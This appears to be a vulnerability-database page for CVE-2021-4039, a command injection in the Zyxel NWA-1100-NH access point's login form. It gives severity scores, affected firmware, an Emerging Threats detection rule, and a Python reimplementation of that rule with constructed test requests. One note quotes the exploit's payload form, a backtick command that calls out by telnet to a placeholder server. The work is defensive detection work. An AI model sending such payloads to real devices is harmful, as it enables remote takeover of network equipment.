CVE-2021-4039
Published 2022-03-01
A command injection vulnerability in the web interface of the Zyxel NWA-1100-NH firmware could allow an attacker to execute arbitrary OS commands on the device.
Priority: P1 · 91 · critical · CVSS 3.1 base score 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Exploited in the wild · VulnCheck KEV
EPSS: 71.05% (99.3rd percentile)
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zyxel | nwa1100-nh_firmware | < 2.12\(aasi.3\)c0 | 2.12\(aasi.3\)c0 |
| zyxel | nwa1100-nh_firmware | — | — |
Detection & IOCs (extracted from sources)
snort
```
alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET EXPLOIT Zyxel NWA-1100-NH Command Injection Attempt (CVE-2021-4039)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:17; content:"/login/login.html"; fast_pattern; http.request_body; content:"myname="; content:"mypasswd="; content:"Submit=Login"; pcre:"/myname=[^&]+(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/i"; reference:url,www.zyxel.com/support/OS-command-injection-vulnerability-of-NWA1100-NH-access-point.shtml; reference:url,cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; reference:url,www.exploit-db.com/exploits/50870; reference:cve,2021-4039; classtype:attempted-admin; sid:2036737; rev:2; metadata:attack_target Networking_Equipment, created_at 2022_06_01, cve CVE_2021_4039, deployment Perimeter, deployment SSLDecrypt, performance_impact Low, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_26, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
```
- The exploit targets POST requests to /login/login.html on port 8081 with shell metacharacters (backtick, semicolon, pipe, ampersand) injected into the `myname` parameter of the login form body.
- Detect injection by inspecting the `myname` POST body field for URL-encoded or raw shell metacharacters: %60 (backtick), %3b (semicolon), %7c (pipe), %26 (ampersand), as well as command substitution patterns such as $( or <(.
- The exploit payload uses backtick-enclosed OS commands (e.g., `id|telnet yourserverhere 21`) to achieve out-of-band command execution via a reverse telnet connection; that outbound connection can serve as a callback indicator.
- The ET rule (sid:2036737) requires all three body tokens (myname=, mypasswd=, and Submit=Login) to be present simultaneously, reducing false positives while matching the exact login form structure.
- The URI match enforces an exact byte size of 17 (bsize:17) for /login/login.html so that longer paths that merely contain this string do not match.
- The ET rule is tagged for Perimeter and SSLDecrypt deployments, meaning it will miss exploitation attempts over HTTPS unless TLS inspection is enabled.
- All firmware versions before 2.12 are affected; the patched version is NWA1100-NH_2.12(AASI.3)C0.
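Added example, not code from the page's sources or from Emerging Threats: a Python reimplementation of the rule's match logic (POST, exact URI, three body tokens, the quoted pcre) run over constructed requests. It also shows a caveat of the pcre as quoted above: the raw `&` (\x26) in its character class is the form-field separator, so a benign login also fires whenever `myname` is not the last field; the tightened variant in the block keeps only the encoded `%26` and is this page's suggestion, not an ET revision.

```python
import re

# pcre copied from the ET rule (sid:2036737): raw or URL-encoded backtick, ';', '|', '&'
# after the myname value, or a command-substitution opener such as $( / <( / >(.
ET_PCRE = re.compile(
    r"myname=[^&]+(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26"
    r"|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))", re.IGNORECASE)
# Tightened variant (this page's suggestion, not ET's): the raw '&' (\x26) is dropped
# from the class because in a form body it is only the parameter separator; an '&'
# meant for the shell arrives URL-encoded as %26, which is still caught.
TIGHT_PCRE = re.compile(
    r"myname=[^&]+(?:[\x60\x3b\x7c]|%60|%3b|%7c|%26"
    r"|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))", re.IGNORECASE)
LOGIN_URI = "/login/login.html"          # rule: bsize:17 on http.uri, i.e. exact match
BODY_TOKENS = ("myname=", "mypasswd=", "Submit=Login")

def parse_request(raw: bytes):
    """Return (method, uri, body) from a raw HTTP/1.x request, or None if malformed."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].split(b" ")
    if not sep or len(parts) < 2:
        return None
    return parts[0].decode("latin-1"), parts[1].decode("latin-1"), body.decode("latin-1")

def matches(raw: bytes, pcre=ET_PCRE) -> bool:
    """Mirror the rule: POST, exact URI, all three form tokens, then the pcre on the body."""
    parsed = parse_request(raw)
    if parsed is None:
        return False
    method, uri, body = parsed
    if method != "POST" or uri != LOGIN_URI or not all(t in body for t in BODY_TOKENS):
        return False
    return pcre.search(body) is not None

def _req(body: str, uri: str = LOGIN_URI) -> bytes:
    """Build a constructed test request (not captured traffic)."""
    return (f"POST {uri} HTTP/1.1\r\nHost: ap.example\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}").encode()

# Constructed samples, not captured traffic.
SAMPLES = {
    "benign_login":  _req("myname=admin&mypasswd=s3cret&Submit=Login"),
    "raw_semicolon": _req("myname=admin;x&mypasswd=a&Submit=Login"),
    "encoded_subst": _req("myname=admin%24%28x%29&mypasswd=a&Submit=Login"),
    "wrong_field":   _req("myname=admin&mypasswd=a;x&Submit=Login"),
    "longer_uri":    _req("myname=admin;x&mypasswd=a&Submit=Login", "/login/login.html.bak"),
}

def scan(pcre=ET_PCRE) -> dict:
    """Run every sample through the rule logic with the chosen pcre."""
    return {name: matches(raw, pcre) for name, raw in SAMPLES.items()}
```

With `ET_PCRE` the benign login and the `wrong_field` sample both match because `myname=admin&` satisfies the raw `\x26` alternative; with `TIGHT_PCRE` only the two injected samples match.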
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vulncheck | — | 9.8 | CRITICAL | — |
GHSA
GHSA-9ww2-qwrq-m7wv (ghsa_unreviewed · 2022-03-02) · CVE-2021-4039 [CRITICAL] · CWE-78
A command injection vulnerability in the web interface of the Zyxel NWA-1100-NH firmware could allow an attacker to execute arbitrary OS commands on the device.
VulnCheck
vulncheck · 2021 · CVSS 9.8
CVE-2021-4039 [CRITICAL] Zyxel nwa1100-nh_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
A command injection vulnerability in the web interface of the Zyxel NWA-1100-NH firmware could allow an attacker to execute arbitrary OS commands on the device.
Affected: Zyxel nwa1100-nh_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References:
- https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers
- https://cujo.com/blog/the-2022-2023-iot-botnet-report-vulnerabilities-targeted/
- https://cujo.com/the-2022-2023-iot-botnet-report-vulnerabilities-targeted/
Suricata
suricata · 2022-06-01 · CVSS 9.8
CVE-2021-4039 [CRITICAL] ET EXPLOIT Zyxel NWA-1100-NH Command Injection Attempt (CVE-2021-4039)
Rule: sid:2036737, quoted in full under Detection & IOCs above.
References:
- http://packetstormsecurity.com/files/166752/Zyxel-NWA-1100-NH-Command-Injection.html
- https://www.zyxel.com/support/OS-command-injection-vulnerability-of-NWA1100-NH-access-point.shtml